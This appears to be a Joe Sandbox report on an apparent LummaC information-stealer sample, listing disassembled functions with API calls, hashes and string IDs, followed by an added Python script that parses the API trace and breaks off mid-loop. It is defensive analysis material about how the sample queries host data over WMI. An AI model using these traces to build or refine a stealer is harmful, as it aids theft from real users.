• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                                          • Opcode ID: aa3d1f857265f2d1eec240e1ce09a33a68e210528346f5167762aa40738f4e39
                                                                                                                                                                                                                                                                                          • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa3d1f857265f2d1eec240e1ce09a33a68e210528346f5167762aa40738f4e39
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                                          • Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7d951b1bf8575b638b514a071f1e27b8906d3225ac76758bc526cbf2df91afa5
                                                                                                                                                                                                                                                                                          • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d951b1bf8575b638b514a071f1e27b8906d3225ac76758bc526cbf2df91afa5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

Control-flow Graph
• API calls in graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0248024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14

Control-flow Graph
• API calls in graph: GetForegroundWindow
APIs
• GetForegroundWindow.USER32 ref: 0043AB9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: ForegroundWindow
• String ID: ilmn
• API String ID: 2020703349-1560153188
• Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
• Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
• Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
• Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Control-flow Graph
• API calls in graph: CoInitializeEx (2 calls)
APIs
• CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: Initialize
• String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                                                                                                                                                                                          • Instruction ID: 6a516bc968bc721a6a6447d4bb28a67b77a0153a8c52e65a7a5ccdf46234fc14
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 828fab947e5c2764a9ce25ea7f9d0b0a3413673922552607edf72b4d8bb17e1e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41E8B4D10B40AFD370EF39DA4B7127EB4AB05250F504B2EF9E6866D4E231A4198BD7

control_flow_graph 715 2480e0f-2480e24 SetErrorMode * 2 716 2480e2b-2480e2c 715->716 717 2480e26 715->717 717->716
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,02480223,?,?), ref: 02480E19
• SetErrorMode.KERNELBASE(00000000,?,?,02480223,?,?), ref: 02480E1E
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 625e0f7f1e1b302f448508261efaf1e752b234688f5247d6a6466c6c1b929a9e
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 85D0123215512877D7003A94DC09BDE7B1CDF05B66F008011FB0DD9180C770954046E5
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
• Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
• Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
• Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F
APIs
• GetForegroundWindow.USER32 ref: 0043AB9F
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
• Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
• Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
• Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E65A
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
• Instruction ID: 1ef2cd84d3f3a248c300a9315f5ba7c079722d57ce9cb5108686e78c00d3b34e
• Opcode Fuzzy Hash: e3be36b273c4f5638e7aeec999eac9b187b5e3b3b1c7f84a5c748abd72b271c0
• Instruction Fuzzy Hash: 03D0C9343C434076F2654718EC57F1432119302F11F701224B323FE2E1C9D07141860C
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
• Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
• Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
• Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                          • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                                          • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                                          • Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008E9F9E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E9000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_8e9000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 0cd5aced46408a83f9828b39d706291ee6d69e0dc12a40ce8dfc353cec580273
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96112B79A00208EFDB01DF99C985E98BBF5EF09751F058094F9489B362D771EA50DB81
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                                                          • API String ID: 0-1394229784
                                                                                                                                                                                                                                                                                          • Opcode ID: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                                                          • Instruction ID: baf5855529d5c49cf6cfb0e88b2a8186660a83bc73687cd3c779ef1732dd6a1a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad0ccab371ecf03d36c413c93bc7494f07a7df5888065dda6a46f4b89f4694b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5622462190C7E9CDEB26C638CC587DDBEA15F56314F0841D9C1996B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                                                                                                                                                                                                                                                          • API String ID: 0-1394229784
                                                                                                                                                                                                                                                                                          • Opcode ID: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
                                                                                                                                                                                                                                                                                          • Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a56254765318387d5ea3dd4d584f94a84871a07d556f59630aa43d509a526f11
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                                                                                                                                                                                                                                                          • API String ID: 0-334816167
                                                                                                                                                                                                                                                                                          • Opcode ID: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
                                                                                                                                                                                                                                                                                          • Instruction ID: 25ecd6609553f32baca7714e8aeceeec93040c6e209c9c053f4265ccc1d4356a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63cdccc75301cd355fa4edc8c506f7aea9a9e61635fb673e26f729942e3a0ac3
• Instruction Fuzzy Hash: AFF1E421D087E98ADB32C67C8C543CDBFA15B53324F1943D9D4E9AB3D2C6790A46CB62
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
• API String ID: 0-334816167
• Opcode ID: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
• Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
• Opcode Fuzzy Hash: 8a4a65c913a0549b7293d237ea660453a96265463489dae8efe8e44eb9074128
• Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56
APIs
• CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 024B6675
• SysAllocString.OLEAUT32(FA46F8B5), ref: 024B66D1
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024B670E
• SysAllocString.OLEAUT32(w!s#), ref: 024B6762
• SysAllocString.OLEAUT32(A3q5), ref: 024B6808
• VariantInit.OLEAUT32(?), ref: 024B687A
• VariantClear.OLEAUT32(?), ref: 024B69DC
• SysFreeString.OLEAUT32(00000000), ref: 024B6A1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
• String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
• API String ID: 2775254435-4124187736
• Opcode ID: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
• Instruction ID: 5b3348aa32d787808aa2bd7c848211984107a7b7c5ca6801c41b61df10d9f28a
• Opcode Fuzzy Hash: 7f006d42d978ea279f5d884ff5246a5058d7d597c52cd245997dba74b9415a56
• Instruction Fuzzy Hash: 0E12EEB26083409BD714CF29C881BABBBEAFFC9304F15892DE695DB290D774D505CB92
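The function above (memory region 02480000) is the one whose API trace reads as a WMI client: a COM object is created, a BSTR is allocated, CoSetProxyBlanket is applied with impersonation, two more BSTRs are allocated, and a VARIANT is initialised and cleared. That ordering, together with the argument values the sandbox captured for CoSetProxyBlanket, is what backs the report's "Queries sensitive BIOS Information (via WMI ...)" signature; the BSTR contents shown ("w!s#", "A3q5") are not plaintext, consistent with the "LummaC encrypted strings found" signature, so the namespace and query text cannot be read from this listing. The script below is an added triage helper and is not part of the Joe Sandbox report or of the sample: it parses API lines in the report's own "Name.MODULE(args), ref: addr" format, names the CoSetProxyBlanket constants (values from rpcdce.h and objidl.h), and checks whether the call order matches the documented WMI client sequence. The sample input is the eight lines above, re-typed as a string so the code runs offline; the pattern check is a heuristic and does not identify which WMI class was queried.

```python
import re

# Constructed test input: the eight "APIs" lines of the function entry for memory
# region 02480000 on this page, re-typed so the parser runs offline.
SAMPLE_APIS = """\
• CoCreateInstance.COMBASE(0043F68C,00000000,00000001,0043F67C), ref: 024B6675
• SysAllocString.OLEAUT32(FA46F8B5), ref: 024B66D1
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024B670E
• SysAllocString.OLEAUT32(w!s#), ref: 024B6762
• SysAllocString.OLEAUT32(A3q5), ref: 024B6808
• VariantInit.OLEAUT32(?), ref: 024B687A
• VariantClear.OLEAUT32(?), ref: 024B69DC
• SysFreeString.OLEAUT32(00000000), ref: 024B6A1A
"""

# One Joe Sandbox API line: optional bullet, Name.MODULE(args), ref: hex address.
API_LINE = re.compile(
    r"^(?:•\s*)?(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Windows names for the constant parameters of CoSetProxyBlanket (rpcdce.h / objidl.h).
AUTHN_SERVICE = {0: "RPC_C_AUTHN_NONE", 9: "RPC_C_AUTHN_GSS_NEGOTIATE", 10: "RPC_C_AUTHN_WINNT",
                 16: "RPC_C_AUTHN_GSS_KERBEROS", 0xFFFFFFFF: "RPC_C_AUTHN_DEFAULT"}
AUTHZ_SERVICE = {0: "RPC_C_AUTHZ_NONE", 1: "RPC_C_AUTHZ_NAME", 2: "RPC_C_AUTHZ_DCE",
                 0xFFFFFFFF: "RPC_C_AUTHZ_DEFAULT"}
AUTHN_LEVEL = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE", 2: "RPC_C_AUTHN_LEVEL_CONNECT",
               3: "RPC_C_AUTHN_LEVEL_CALL", 4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
               6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
IMP_LEVEL = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS", 2: "RPC_C_IMP_LEVEL_IDENTIFY",
             3: "RPC_C_IMP_LEVEL_IMPERSONATE", 4: "RPC_C_IMP_LEVEL_DELEGATE"}
CAPABILITIES = {0: "EOAC_NONE", 1: "EOAC_MUTUAL_AUTH", 0x20: "EOAC_STATIC_CLOAKING", 0x40: "EOAC_DYNAMIC_CLOAKING"}


def parse_api_lines(text):
    """Parse report lines into dicts of name, module, argument tokens and call-site address."""
    calls = []
    for raw in text.splitlines():
        m = API_LINE.match(raw.strip())
        if not m:
            continue  # headings such as "APIs" or "Strings" are skipped
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"name": m["name"], "module": m["module"],
                      "args": args, "ref": int(m["ref"], 16)})
    return calls


def _const(table, token):
    """Name a hex argument; '?' (unresolved by the sandbox) or a string literal is returned unchanged."""
    try:
        value = int(token, 16)
    except ValueError:
        return token
    return table.get(value, hex(value))


def decode_proxy_blanket(args):
    """Decode CoSetProxyBlanket(pProxy, dwAuthnSvc, dwAuthzSvc, pServerPrincName,
    dwAuthnLevel, dwImpLevel, pAuthInfo, dwCapabilities) into constant names."""
    if len(args) != 8:
        raise ValueError("CoSetProxyBlanket takes 8 arguments, got %d" % len(args))
    return {
        "dwAuthnSvc": _const(AUTHN_SERVICE, args[1]),
        "dwAuthzSvc": _const(AUTHZ_SERVICE, args[2]),
        "dwAuthnLevel": _const(AUTHN_LEVEL, args[4]),
        "dwImpLevel": _const(IMP_LEVEL, args[5]),
        "dwCapabilities": _const(CAPABILITIES, args[7]),
    }


def looks_like_wmi_client(calls):
    """Heuristic: CoCreateInstance (locator) -> BSTR alloc (namespace) -> CoSetProxyBlanket
    with impersonation -> BSTR alloc (query) -> VARIANT handling, i.e. the documented
    WMI client call order. It does not reveal which class was queried."""
    names = [c["name"] for c in calls]
    if "CoCreateInstance" not in names or "CoSetProxyBlanket" not in names:
        return False
    i_create = names.index("CoCreateInstance")
    i_blanket = names.index("CoSetProxyBlanket")
    if not i_create < i_blanket:
        return False
    if decode_proxy_blanket(calls[i_blanket]["args"])["dwImpLevel"] != "RPC_C_IMP_LEVEL_IMPERSONATE":
        return False
    bstr_before = "SysAllocString" in names[i_create:i_blanket]
    bstr_after = "SysAllocString" in names[i_blanket:]
    return bstr_before and bstr_after and "VariantInit" in names


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_APIS)
    for c in calls:
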